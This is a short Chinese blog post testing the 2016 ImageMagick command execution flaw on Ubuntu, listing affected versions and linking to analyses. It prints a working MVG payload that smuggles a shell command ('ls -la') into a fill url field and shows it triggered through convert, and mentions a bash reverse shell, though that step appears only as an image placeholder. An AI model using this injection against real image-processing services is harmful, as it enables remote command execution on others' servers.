ImageMagick命令执行漏洞

头像
7shad0w
    阅读 1 分钟

    这两天刚爆的ImageMagick命令执行漏洞比较火。

    影响版本范围

    ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)
    ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)
    低版本至6.9.3-9 released 2016-04-30

    漏洞分析:
    http://bobao.360.cn/learning/detail/2863.html
    http://ricterz.me/posts/Write%20Up%3A%20Remote%20Command%20Execute%20in%20Wordpress%204.5.1?_=1462514836692
    http://drops.wooyun.org/papers/15589

    来测试下

    Ubuntun16.04

    convert --version

    图片描述

    图片描述

    push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls -la")'
pop graphic-context

    执行convert exp1.gif xx.png

    图片描述

    下面我们来用bash来反弹shell看看

    图片描述

    imagemagick
    7shad0w
    6 声望2 粉丝
    « 上一篇
    sh: 1: Syntax error: Bad fd number 错误
    下一篇 »
    在Eclipse中使用XDebug调试代码 | Using XDebug debug code in eclipse

    引用和评论

    推荐阅读
    头像
    Http Smuggling Attack - 1

    7shad0w阅读 2.2k

    0 条评论
    得票最新